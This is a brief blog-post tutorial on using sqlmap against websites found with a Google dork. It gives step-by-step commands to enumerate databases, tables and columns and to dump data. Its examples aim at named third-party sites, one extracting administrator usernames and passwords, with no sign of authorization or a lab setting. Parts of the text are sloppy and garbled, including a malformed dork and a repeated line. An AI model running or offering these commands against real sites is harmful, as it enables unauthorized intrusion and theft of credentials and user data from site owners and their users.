sqlmap tutorial
- Check vulnerable website
'' type in google ?php id ==1 "
- open terminal sqlmap go to help option
- SQLMAP ....
type "sqlmap -u <url> --dbs"
--dbs = use for show database
- then sqlmap show website vulnerability
then enter on that directory
type "sqlmap -u <url> -D <directory> --tables"
tables = Show table attributes
- In which table you want to access type "-T"
"sqlmap -u http://www.asfaa.org/members.php?id=1 -D information_schema -T FILES -- columns "
Columns= Show Columns attributes
Columns= Show Columns attributes
- To access columns type synatax == '-C'
" sqlmap -u <url > -D <directory> -T <table attributes> -C <columns attributes> --dump"
dump = use for dump data or extract data from websites
example..
""sqlmap -u https://www.bible-history.com/subcat.php?id=1 -D bible_history -T administrators -C admin_password,admin_username --dump ""
for any query please suggest below in the comment box
or
watch video on my channels
Written By Sanjay Kumar
Comments
Post a Comment